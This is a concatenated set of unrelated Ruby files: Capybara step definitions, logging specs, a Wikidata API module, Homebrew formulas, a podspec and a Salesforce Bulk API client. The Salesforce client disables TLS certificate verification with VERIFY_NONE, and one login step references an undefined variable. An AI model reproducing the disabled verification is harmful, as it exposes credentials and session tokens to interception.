rescue Timeout::Error
raise "Couldn't find the #{text} in webpage"
end
end
When(/^I wait until I see "([^"]*)" text, refreshing the page$/) do |text|
begin
Timeout.timeout(DEFAULT_TIMEOUT) do
loop do
break if page.has_content?(text)
sleep 1
page.evaluate_script 'window.location.reload()'
end
end
rescue Timeout::Error
raise "Couldn't find the #{text} in webpage"
end
end
When(/^I wait until I do not see "([^"]*)" text, refreshing the page$/) do |text|
begin
Timeout.timeout(DEFAULT_TIMEOUT) do
loop do
break unless page.has_content?(text)
sleep 3
page.evaluate_script 'window.location.reload()'
end
end
rescue Timeout::Error
raise "The #{text} was always there in webpage"
end
end
#
# Check a checkbox of the given id
#
When(/^I check "([^"]*)"$/) do |box|
check(box)
end
When(/^I uncheck "([^"]*)"$/) do |box|
uncheck(box)
end
#
# Click on a button
#
When(/^I click on "([^"]*)"$/) do |button|
begin
click_button button, match: :first
rescue
sleep 4
click_button button, match: :first
end
end
#
# Click on a button and confirm in alert box
When(/^I click on "([^"]*)" and confirm$/) do |button|
accept_alert do
step %(I click on "#{button}")
sleep 1
end
end
#
# Click on a link
#
When(/^I follow "([^"]*)"$/) do |text|
begin
click_link(text)
rescue
sleep 3
click_link(text)
end
end
#
# Click on the first link
#
When(/^I follow first "([^"]*)"$/) do |text|
click_link(text, match: :first)
end
# FIXME: this step need adaption
Given(/^I am authorized as "([^"]*)" with password "([^"]*)"$/) do |user, pwd|
# visit webpage login
visit Capybara.app_host
fill_in 'username', with: user
fill_in 'password', with: arg2
click_button 'Sign In'
step %(I should be logged in)
end
#
# Test for a text in the whole page
#
Then(/^I should see a "([^"]*)" text$/) do |arg1|
unless page.has_content?(arg1)
sleep 2
raise unless page.has_content?(arg1)
end
end
#
# Test for a text not allowed in the whole page
#
Then(/^I should not see a "([^"]*)" text$/) do |text|
raise "#{text} found on the page! FAIL" unless page.has_no_content?(text)
end
| 19.48 | 81 | 0.615606 |
39433ebc1228eccb7ae08311811bf50f17b328f3 | 6,206 | # -*- encoding: utf-8 -*-
require_relative 'spec_helper'
describe Message do
describe 'providing an evaluted message that is not a string' do
let(:subject) { Message.new(ndc: [], message: Rational(1.5)) }
it 'returns the given message' do
assert_equal '3/2', subject.to_s
end
end
describe 'providing an evaluted message' do
let(:subject) { Message.new(ndc: [], message: 'Evaluated') }
it 'returns the given message' do
assert_equal 'Evaluated', subject.to_s
end
end
describe 'providing a block message that does not return a string' do
let(:subject) do
Message.new(ndc: []) do
Rational(1.5)
end
end
it 'returns the result of evaluating the block and calling #to_s on the result' do
assert_equal '3/2', subject.to_s
end
end
describe 'providing a block message' do
let(:subject) do
@evaluated = 0
Message.new(ndc: []) do
@evaluated += 1
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
it 'only evaluates the block once for multiple calls' do
subject.to_s
subject.to_s
assert_equal 1, @evaluated
end
end
describe 'providing both an evaluated and block message' do
let(:subject) do
Message.new(ndc: [], message: 'Evaluated') do
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
end
describe 'supporting the old constructor format' do
describe 'providing an evaluted message' do
let(:subject) { Message.new('Evaluated') }
it 'returns the given message' do
assert_equal 'Evaluated', subject.to_s
end
end
describe 'providing a block message' do
let(:subject) do
@evaluated = 0
Message.new do
@evaluated += 1
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
it 'only evaluates the block once for multiple calls' do
subject.to_s
subject.to_s
assert_equal 1, @evaluated
end
end
describe 'providing both an evaluated and block message' do
let(:subject) do
Message.new('Evaluated') do
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
end
end
describe 'filtering backtraces' do
def generate_error
raise 'Example failure'
rescue => e
e
end
let(:dirname) { File.dirname(__FILE__) }
let(:error) { generate_error }
let(:subject) do
Message.new(error: generate_error, backtrace_filters: backtrace_filters)
end
require 'rbconfig'
describe 'string keys' do
let(:backtrace_filters) do
{
dirname => '$DIRNAME',
RbConfig::CONFIG['rubylibdir'] => '$RUBYLIBDIR',
}
end
it 'replaces the matching keys' do
backtrace = subject.error.backtrace
backtrace_filters.each do |prefix, replacement|
refute backtrace.find { |line| line.start_with? prefix }, "Backtrace should not have a line starting '#{prefix}'\n\t#{backtrace.join("\n\t")}"
end
end
end
describe 'array keys' do
let(:backtrace_filters) do
{
[dirname, RbConfig::CONFIG['rubylibdir']] => '$REPLACEMENT',
}
end
it 'replaces the matching keys' do
backtrace = subject.error.backtrace
backtrace_filters.each do |prefixes, replacement|
prefixes.each do |prefix|
refute backtrace.find { |line| line.start_with? prefix }, "Backtrace should not have a line starting '#{prefix}'\n\t#{backtrace.join("\n\t")}"
end
end
end
end
describe 'class' do
let(:backtrace_filters) { Hash.new }
it 'returns the class of the error' do
assert_equal subject.error.class, RuntimeError
end
end
end
describe 'filtering backtraces' do
class TestOnlyException < StandardError; end
def generate_error
Invisible.raise_alarm
rescue TestOnlyException => e
e
end
class Invisible
def self.raise_alarm
raise TestOnlyException, 'Example failure'
end
end
let(:dirname) { File.dirname(__FILE__) }
let(:error) { generate_error }
let(:subject) do
Message.new(error: generate_error, backtrace_silencers: backtrace_silencers)
end
require 'rbconfig'
describe 'regex values' do
let(:backtrace_silencers) do
[
/invisible/i
]
end
it 'removes lines matching the keys' do
backtrace = subject.error.backtrace
backtrace_silencers.each do |silencer_regex|
refute backtrace.find { |line| line.match? silencer_regex }, "Backtrace should not have a line starting '#{silencer_regex}'\n\t#{backtrace.join("\n\t")}"
end
end
end
describe 'string values' do
let(:backtrace_silencers) do
[
"Invisible"
]
end
it 'removes lines matching the keys' do
backtrace = subject.error.backtrace
backtrace_silencers.each do |silencer_string|
refute backtrace.find { |line| line.include? silencer_string }, "Backtrace should not have a line starting '#{silencer_string}'\n\t#{backtrace.join("\n\t")}"
end
end
end
end
if ENV["BENCH"] then
describe 'benchmarks' do
let(:subject) { Message.new(ndc: [], message: 'Evaluated') }
it 'invoking to_s once' do
start = Time.now
50_000.times do
subject.to_s
end
took = Time.now - start
puts "\nMessages took #{took} to generate\n"
end
it 'invoking to_s four times' do
start = Time.now
50_000.times do
subject.to_s
subject.to_s
subject.to_s
subject.to_s
end
took = Time.now - start
puts "\nMessages took #{took} to generate\n"
end
end
end
end
| 24.14786 | 167 | 0.610055 |
edb5899ab9dccb4cf3425f2918b83f2e03902c1a | 283 | module ExceptionList
URI_EXCEPTIONS = [Errno::ETIMEDOUT, Errno::ECONNREFUSED, URI::InvalidURIError, Net::OpenTimeout, SocketError].freeze
REST_CLIENT_EXCEPTIONS = [RestClient::NotFound, RestClient::GatewayTimeout, RestClient::BadRequest, RestClient::MethodNotAllowed].freeze
end
| 56.6 | 138 | 0.819788 |
87016835b7e0b19af0b801cb100caa70af248a7d | 3,891 | # frozen_string_literal: true
module Reality::Describers::Wikidata::Impl
module Modules
# Enumerate pages that contain a given URL.
#
# The "submodule" (MediaWiki API term) is included in action after setting some param, providing
# additional tweaking for this param. Example (for {Reality::Describers::Wikidata::Impl::Actions::Query} and
# its submodules):
#
# ```ruby
# api.query # returns Actions::Query
# .prop(:revisions) # adds prop=revisions to action URL, and includes Modules::Revisions into action
# .limit(10) # method of Modules::Revisions, adds rvlimit=10 to URL
# ```
#
# All submodule's parameters are documented as its public methods, see below.
#
module Exturlusage
# Which pieces of information to include:
#
# @param values [Array<String>] Allowed values: "ids" (Adds the ID of page), "title" (Adds the title and namespace ID of the page), "url" (Adds the URL used in the page).
# @return [self]
def prop(*values)
values.inject(self) { |res, val| res._prop(val) or fail ArgumentError, "Unknown value for prop: #{val}" }
end
# @private
def _prop(value)
defined?(super) && super || ["ids", "title", "url"].include?(value.to_s) && merge(euprop: value.to_s, replace: false)
end
# When more results are available, use this to continue.
#
# @param value [Integer]
# @return [self]
def offset(value)
merge(euoffset: value.to_s)
end
# Protocol of the URL. If empty and euquery is set, the protocol is http. Leave both this and euquery empty to list all external links.
#
# @param value [String] One of "bitcoin", "ftp", "ftps", "geo", "git", "gopher", "http", "https", "irc", "ircs", "magnet", "mailto", "mms", "news", "nntp", "redis", "sftp", "sip", "sips", "sms", "ssh", "svn", "tel", "telnet", "urn", "worldwind", "xmpp".
# @return [self]
def protocol(value)
_protocol(value) or fail ArgumentError, "Unknown value for protocol: #{value}"
end
# @private
def _protocol(value)
defined?(super) && super || ["bitcoin", "ftp", "ftps", "geo", "git", "gopher", "http", "https", "irc", "ircs", "magnet", "mailto", "mms", "news", "nntp", "redis", "sftp", "sip", "sips", "sms", "ssh", "svn", "tel", "telnet", "urn", "worldwind", "xmpp"].include?(value.to_s) && merge(euprotocol: value.to_s)
end
# Search string without protocol. See Special:LinkSearch. Leave empty to list all external links.
#
# @param value [String]
# @return [self]
def query(value)
merge(euquery: value.to_s)
end
# The page namespaces to enumerate.
#
# @param values [Array<String>] Allowed values: "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "120", "121", "122", "123", "828", "829", "1198", "1199", "2300", "2301", "2302", "2303", "2600".
# @return [self]
def namespace(*values)
values.inject(self) { |res, val| res._namespace(val) or fail ArgumentError, "Unknown value for namespace: #{val}" }
end
# @private
def _namespace(value)
defined?(super) && super || ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "120", "121", "122", "123", "828", "829", "1198", "1199", "2300", "2301", "2302", "2303", "2600"].include?(value.to_s) && merge(eunamespace: value.to_s, replace: false)
end
# How many pages to return.
#
# @param value [Integer, "max"]
# @return [self]
def limit(value)
merge(eulimit: value.to_s)
end
# Expand protocol-relative URLs with the canonical protocol.
#
# @return [self]
def expandurl()
merge(euexpandurl: 'true')
end
end
end
end
| 41.83871 | 313 | 0.579029 |
7995d383986393a3e9b67a14f49639b2c4f747fc | 434 | class CreateChatTeams < ActiveRecord::Migration
include Gitlab::Database::MigrationHelpers
DOWNTIME = true
DOWNTIME_REASON = "Adding a foreign key"
disable_ddl_transaction!
def change
create_table :chat_teams do |t|
t.references :namespace, null: false, index: { unique: true }, foreign_key: { on_delete: :cascade }
t.string :team_id
t.string :name
t.timestamps null: false
end
end
end
| 22.842105 | 105 | 0.700461 |
1d97f90f7a41cb88e8a3bb94ff7f5d915c3e948c | 1,414 | describe EdoOracle::SubjectAreas do
subject { described_class.fetch }
before do
allow(EdoOracle::Queries).to receive(:get_subject_areas).and_return subject_areas.map { |area| {'subjectarea' => area} }
end
context 'a variety of subject areas' do
let(:subject_areas) { ['ARABIC', 'COM LIT', 'ENE,RES', 'ENGLISH', 'L & S', 'XL&S'] }
it 'provides decompressions' do
expect(subject.decompress 'COMLIT').to eq 'COM LIT'
expect(subject.decompress 'ENERES').to eq 'ENE,RES'
expect(subject.decompress 'LS').to eq 'L & S'
expect(subject.decompress 'XLS').to eq 'XL&S'
end
it 'allows no-op decompressions to pass through' do
expect(subject.decompress 'COM LIT').to eq 'COM LIT'
expect(subject.decompress 'ENGLISH').to eq 'ENGLISH'
expect(subject.decompress 'L & S').to eq 'L & S'
end
it 'returns original value when decompression unavailable' do
expect(subject.decompress 'STUDIES').to eq 'STUDIES'
end
end
context 'multiple decompressions available' do
let(:subject_areas) { ['L&S', 'L & S', 'LATAMST', 'PHYS ED', 'PHYSED', 'PHYSIOL'] }
it 'prefers the longest available' do
expect(subject.decompress 'LS').to eq 'L & S'
expect(subject.decompress 'PHYSED').to eq 'PHYS ED'
end
it 'transforms a partial to a full decompression' do
expect(subject.decompress 'L&S').to eq 'L & S'
end
end
end
| 38.216216 | 124 | 0.660537 |
613c767ae587992ccdd5df85ae56494e76219d11 | 134 | class Sfn::HasSatisfaction
attr_reader :satisfaction
def initialize(satisfaction)
@satisfaction = satisfaction
end
end | 16.75 | 32 | 0.753731 |
1cbc16348b302dbd3dfcf864d03e37afd618b1bd | 2,860 | class QtPerconaServer < Formula
desc "Qt SQL Database Driver"
homepage "https://www.qt.io/"
url "https://download.qt.io/official_releases/qt/6.1/6.1.3/submodules/qtbase-everywhere-src-6.1.3.tar.xz"
sha256 "1e9abb2ea4daa0fd11f46fc871d9e896b916e1b7130fed74c83d66221bb4fe78"
license all_of: ["LGPL-2.1-only", "LGPL-3.0-only"]
livecheck do
formula "qt"
end
bottle do
sha256 cellar: :any, arm64_big_sur: "8bf3ea2a32d66415dd802813ea09fa15ac9eeab75b5d4e49effcad08ab3771a5"
sha256 cellar: :any, big_sur: "7228edab478768ef2398b4f1c9d36f075d95e932f7083f1b5b5deecc98c966e2"
sha256 cellar: :any, catalina: "fd84ae9e43efc6844a7ce0895f4060465444f48dbcb903fb1129c26ca634c497"
sha256 cellar: :any, mojave: "1b4d4e64aa2e52436873b7c71a3f2f5202b0b6285f96a1776d2c701385ccc8b7"
end
depends_on "cmake" => [:build, :test]
depends_on "pkg-config" => :build
depends_on "percona-server"
depends_on "qt"
conflicts_with "qt-mysql", "qt-mariadb",
because: "qt-mysql, qt-mariadb, and qt-percona-server install the same binaries"
def install
args = std_cmake_args + %W[
-DCMAKE_STAGING_PREFIX=#{prefix}
-DFEATURE_sql_ibase=OFF
-DFEATURE_sql_mysql=ON
-DFEATURE_sql_oci=OFF
-DFEATURE_sql_odbc=OFF
-DFEATURE_sql_psql=OFF
-DFEATURE_sql_sqlite=OFF
-DMySQL_LIBRARY=#{Formula["percona-server"].opt_lib}/#{shared_library("libperconaserverclient")}
]
cd "src/plugins/sqldrivers" do
system "cmake", "-S", ".", "-B", "build", *args
system "cmake", "--build", "build"
system "cmake", "--install", "build"
end
end
test do
(testpath/"CMakeLists.txt").write <<~EOS
cmake_minimum_required(VERSION 3.16.0)
project(test VERSION 1.0.0 LANGUAGES CXX)
set(CMAKE_CXX_STANDARD 17)
set(CMAKE_CXX_STANDARD_REQUIRED ON)
set(CMAKE_AUTOMOC ON)
set(CMAKE_AUTORCC ON)
set(CMAKE_AUTOUIC ON)
find_package(Qt6 COMPONENTS Core Sql REQUIRED)
add_executable(test
main.cpp
)
target_link_libraries(test PRIVATE Qt6::Core Qt6::Sql)
EOS
(testpath/"test.pro").write <<~EOS
QT += core sql
QT -= gui
TARGET = test
CONFIG += console
CONFIG -= app_bundle
TEMPLATE = app
SOURCES += main.cpp
EOS
(testpath/"main.cpp").write <<~EOS
#include <QCoreApplication>
#include <QtSql>
#include <cassert>
int main(int argc, char *argv[])
{
QCoreApplication a(argc, argv);
QSqlDatabase db = QSqlDatabase::addDatabase("QMYSQL");
assert(db.isValid());
return 0;
}
EOS
system "cmake", "-DCMAKE_BUILD_TYPE=Debug", testpath
system "make"
system "./test"
ENV.delete "CPATH"
system "qmake"
system "make"
system "./test"
end
end
| 29.183673 | 107 | 0.661189 |
26b2edd1eb08193df64f776691229f9d80c8dff5 | 5,128 | #
# Be sure to run `pod spec lint ZWSProgressHUD.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "ZWSProgressHUD"
s.version = "0.0.2"
s.summary = "ZWSProgressHUD from MBProgressHUD"
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
ZWSProgressHUD from MBProgressHUD create by zheng.
DESC
s.homepage = "https://github.com/zhengweishu/ZWSProgressHUD"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "zhengweishu" => "[email protected]" }
# Or just: s.author = "zhengweishu"
# s.authors = { "zhengweishu" => "[email protected]" }
# s.social_media_url = "http://twitter.com/zhengweishu"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# s.platform = :ios
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://github.com/zhengweishu/ZWSProgressHUD.git", :tag => "0.0.2" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "ZWSProgressHUD/**/*.{h,m}"
# s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = ""
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "MBProgressHUD", "~> 0.9.2"
end
| 36.892086 | 99 | 0.595944 |
e2741040882fe5b3e6ba9e100dec4d5293f1e09e | 1,614 | class GnuTypist < Formula
desc "GNU typing tutor"
homepage "https://www.gnu.org/software/gtypist/"
url "https://ftp.gnu.org/gnu/gtypist/gtypist-2.9.5.tar.xz"
mirror "https://ftpmirror.gnu.org/gtypist/gtypist-2.9.5.tar.xz"
sha256 "c13af40b12479f8219ffa6c66020618c0ce305ad305590fde02d2c20eb9cf977"
revision 1
bottle do
sha256 "3cc13439bb4afad581022e52c5827e2cc081565bc83f2c8f47c11b21c8ad2751" => :mojave
sha256 "79367e864781c4a9fe5b25e737e99bdcae8c7b11a2198459d72775120495c2c3" => :high_sierra
sha256 "014e293ce1ed514fe95e6fce4cbedefdc876a51b6d38a740183b8ce959899e5a" => :sierra
sha256 "75fcb398d3997d6d9357bb6cf5638d2e10e469ce114b344865d37112754cc7af" => :el_capitan
sha256 "285c918d6b2240e294e6b192aff25de0f0383f9ac645d8883e04e3443e52b674" => :yosemite
end
depends_on "gettext"
# Use Apple's ncurses instead of ncursesw.
# TODO: use an IFDEF for apple and submit upstream
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/42c4b96/gnu-typist/2.9.5.patch"
sha256 "a408ecb8be3ffdc184fe1fa94c8c2a452f72b181ce9be4f72557c992508474db"
end
def install
# libiconv is not linked properly without this
ENV.append "LDFLAGS", "-liconv" if OS.mac?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--with-lispdir=#{elisp}"
system "make"
system "make", "install"
end
test do
session = fork do
exec bin/"gtypist", "-t", "-q", "-l", "DEMO_0", share/"gtypist/demo.typ"
end
sleep 2
Process.kill("TERM", session)
end
end
| 35.866667 | 99 | 0.722429 |
332df96dc3ae85ac05a6d16203fa2e6bbc449072 | 54 | class Size < ApplicationRecord
has_many :dogs
end
| 13.5 | 30 | 0.759259 |
f81b8fad5dc2a949685b3f00fdb2e13378391d2c | 8,866 | module SalesforceBulk
# Interface for operating the Salesforce Bulk REST API
class Client
# The host to use for authentication. Defaults to login.salesforce.com.
attr_accessor :login_host
# The instance host to use for API calls. Determined from login response.
attr_accessor :instance_host
# The Salesforce password
attr_accessor :password
# The Salesforce username
attr_accessor :username
# The API version the client is using. Defaults to 24.0.
attr_accessor :version
# The ID for authenticated session
attr_reader :session_id
def initialize(options={})
options = {:login_host => 'login.salesforce.com', :version => 24.0}.merge(options)
assert_valid_keys(options, :username, :password, :login_host, :version)
self.username = options[:username]
self.password = "#{options[:password]}"
self.login_host = options[:login_host]
self.version = options[:version]
@api_path_prefix = "/services/async/#{version}/"
@valid_operations = [:delete, :insert, :update, :upsert, :query]
@valid_concurrency_modes = ['Parallel', 'Serial']
end
def authenticate
# Clear session attributes just in case client already had a session
@session_id = nil
self.instance_host = nil
xml = '<?xml version="1.0" encoding="utf-8"?>'
xml += '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema"'
xml += ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
xml += ' xmlns:env="http://schemas.xmlsoap.org/soap/envelope/">'
xml += "<env:Body>"
xml += '<n1:login xmlns:n1="urn:partner.soap.sforce.com">'
xml += "<n1:username>#{username}</n1:username>"
xml += "<n1:password>#{password.encode(xml: :text)}</n1:password>"
xml += "</n1:login>"
xml += "</env:Body>"
xml += "</env:Envelope>\n"
response = http_post("/services/Soap/u/#{version}", xml, 'Content-Type' => 'text/xml', 'SOAPAction' => 'login')
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
result = data['Body']['loginResponse']['result']
@session_id = result['sessionId']
self.instance_host = "#{instance_id(result['serverUrl'])}.salesforce.com"
self
end
def abort_job(jobId)
xml = '<?xml version="1.0" encoding="utf-8"?>'
xml += '<jobInfo xmlns="http://www.force.com/2009/06/asyncapi/dataload">'
xml += "<state>Aborted</state>"
xml += "</jobInfo>"
response = http_post("job/#{jobId}", xml)
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Job.new_from_xml(data)
end
def add_batch(jobId, data)
body = data
if data.is_a?(Array)
raise ArgumentError, "Data set exceeds 10000 record limit by #{data.length - 10000}" if data.length > 10000
keys = data.first.keys
body = keys.to_csv
data.each do |item|
item_values = keys.map { |key| item[key] }
body += item_values.to_csv
end
end
# Despite the content for a query operation batch being plain text we
# still have to specify CSV content type per API docs.
response = http_post("job/#{jobId}/batch", body, "Content-Type" => "text/csv; charset=UTF-8")
result = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Batch.new_from_xml(result)
end
def add_job(operation, sobject, options={})
operation = operation.to_s.downcase.to_sym
raise ArgumentError.new("Invalid operation: #{operation}") unless @valid_operations.include?(operation)
assert_valid_keys(options, :external_id_field_name, :concurrency_mode)
if options[:concurrency_mode]
concurrency_mode = options[:concurrency_mode].capitalize
raise ArgumentError.new("Invalid concurrency mode: #{concurrency_mode}") unless @valid_concurrency_modes.include?(concurrency_mode)
end
xml = '<?xml version="1.0" encoding="utf-8"?>'
xml += '<jobInfo xmlns="http://www.force.com/2009/06/asyncapi/dataload">'
xml += "<operation>#{operation}</operation>"
xml += "<object>#{sobject}</object>"
xml += "<externalIdFieldName>#{options[:external_id_field_name]}</externalIdFieldName>" if options[:external_id_field_name]
xml += "<concurrencyMode>#{options[:concurrency_mode]}</concurrencyMode>" if options[:concurrency_mode]
xml += "<contentType>CSV</contentType>"
xml += "</jobInfo>"
response = http_post("job", xml)
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Job.new_from_xml(data)
end
def batch_info_list(jobId)
response = http_get("job/#{jobId}/batch")
result = XmlSimple.xml_in(response.body, 'ForceArray' => false)
if result['batchInfo'].is_a?(Array)
result['batchInfo'].collect do |info|
Batch.new_from_xml(info)
end
else
[Batch.new_from_xml(result['batchInfo'])]
end
end
def batch_info(jobId, batchId)
response = http_get("job/#{jobId}/batch/#{batchId}")
result = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Batch.new_from_xml(result)
end
def batch_result(jobId, batchId)
response = http_get("job/#{jobId}/batch/#{batchId}/result")
if ['application/xml', 'text/xml'].include? response.content_type
result = XmlSimple.xml_in(response.body)
if !result['result'].nil? && !result['result'].empty?
results = query_result(jobId, batchId, result['result'].first)
collection = QueryResultCollection.new(self, jobId, batchId, result['result'].first, result['result'])
collection.replace(results)
end
else
result = BatchResultCollection.new(jobId, batchId)
CSV.parse(response.body, :headers => true) do |row|
result << BatchResult.new(row[0], to_boolean(row[1]), to_boolean(row[2]), row[3])
end
result
end
end
def query_result(job_id, batch_id, result_id)
headers = {"Content-Type" => "text/csv; charset=UTF-8"}
response = http_get("job/#{job_id}/batch/#{batch_id}/result/#{result_id}", headers)
lines = response.body.lines.to_a
headers = CSV.parse_line(lines.shift).collect { |header| header.to_sym }
result = []
#CSV.parse(lines.join, :headers => headers, :converters => [:all, lambda{|s| to_boolean(s) if s.kind_of? String }]) do |row|
CSV.parse(lines.join, :headers => headers) do |row|
result << Hash[row.headers.zip(row.fields)]
end
result
end
def close_job(jobId)
xml = '<?xml version="1.0" encoding="utf-8"?>'
xml += '<jobInfo xmlns="http://www.force.com/2009/06/asyncapi/dataload">'
xml += "<state>Closed</state>"
xml += "</jobInfo>"
response = http_post("job/#{jobId}", xml)
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Job.new_from_xml(data)
end
def job_info(jobId)
response = http_get("job/#{jobId}")
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Job.new_from_xml(data)
end
def http_post(path, body, headers={})
headers = {'Content-Type' => 'application/xml'}.merge(headers)
if @session_id
headers['X-SFDC-Session'] = @session_id
host = instance_host
path = "#{@api_path_prefix}#{path}"
else
host = self.login_host
end
response = https_request(host).post(path, body, headers)
if response.is_a?(Net::HTTPSuccess)
response
else
raise SalesforceError.new(response)
end
end
def http_get(path, headers={})
path = "#{@api_path_prefix}#{path}"
headers = {'Content-Type' => 'application/xml'}.merge(headers)
if @session_id
headers['X-SFDC-Session'] = @session_id
end
response = https_request(self.instance_host).get(path, headers)
if response.is_a?(Net::HTTPSuccess)
response
else
raise SalesforceError.new(response)
end
end
def https_request(host)
req = Net::HTTP.new(host, 443)
req.use_ssl = true
req.verify_mode = OpenSSL::SSL::VERIFY_NONE
req
end
def instance_id(url)
url.match(/:\/\/([a-zA-Z0-9\-\.]{2,}).salesforce/)[1]
end
private
def assert_valid_keys(options, *valid_keys)
valid_keys.flatten!
options.each_key do |k|
unless valid_keys.include?(k)
raise ArgumentError.new("Unknown key: #{k.inspect}. Valid keys are: #{valid_keys.map(&:inspect).join(', ')}")
end
end
end
def to_boolean(value)
if !value.nil?
if value.strip.casecmp("true") == 0
return true
elsif value.strip.casecmp("false") == 0
return false
end
end
value
end
end
end
| 32.47619 | 139 | 0.627453 |
acffd113467443543c6635ec9577feb5b051294c | 1,112 | Pod::Spec.new do |s|
s.name = 'Google-Maps-iOS-SDK'
s.version = '1.1.0'
s.summary = 'Google Maps SDK for iOS.'
s.description = 'With the Google Maps SDK for iOS, you can add maps based on Google maps data to your application.'
s.homepage = 'https://developers.google.com/maps/documentation/ios/'
s.license = {
:type => 'Copyright',
:text => 'Copyright 2012 Google Inc.'
}
s.author = 'Google Inc.'
s.source = { :http => 'https://dl.google.com/geosdk/GoogleMaps-iOS-1.1.0.zip' }
s.platform = :ios
s.ios.deployment_target = '5.1'
framework_path = 'GoogleMaps-iOS-1.1.0/GoogleMaps.framework'
s.source_files = "#{framework_path}/Headers/*.h"
s.resource = "#{framework_path}/Resources/GoogleMaps.bundle"
s.preserve_paths = framework_path
s.header_dir = 'GoogleMaps'
s.frameworks = 'GoogleMaps', 'AVFoundation', 'CoreData', 'CoreLocation', 'CoreText', 'GLKit', 'ImageIO', 'OpenGLES', 'QuartzCore', 'SystemConfiguration'
s.libraries = 'icucore', 'stdc++', 'z'
s.xcconfig = { 'FRAMEWORK_SEARCH_PATHS' => '"$(PODS_ROOT)/Google-Maps-iOS-SDK/GoogleMaps-iOS-1.1.0/"' }
end
| 37.066667 | 154 | 0.677158 |
bb956d2b4fc118a540410a75b99d2245c6be5eab | 1,233 | # frozen_string_literal: true
require "simplecov"
# We start it with the rails param to ensure it includes coverage for all code
# started by the rails app, and not just the files touched by our unit tests.
# This gives us the most accurate assessment of our unit test coverage
# https://github.com/colszowka/simplecov#getting-started
SimpleCov.start("rails") do
# We filter the tests folders, mainly to ensure that any dummy apps don't get
# included in the coverage report. However our intent is that nothing in the
# test folders should be included
add_filter "/spec/"
add_filter "/test/"
# Our db folder contains migrations and seeding, functionality we are ok not
# to have tests for
add_filter "/db/"
add_group "Forms", "app/forms"
add_group "Helpers", "app/helpers"
add_group "Jobs", "app/jobs"
add_group "Lib", "app/lib"
add_group "Mailers", "app/mailers"
add_group "Presenters", "app/presenters"
add_group "Services", "app/services"
add_group "Validators", "app/validators"
add_group "Tasks", "lib/tasks"
end
# Use test suite name to help simplecov merge minitest and rspec results
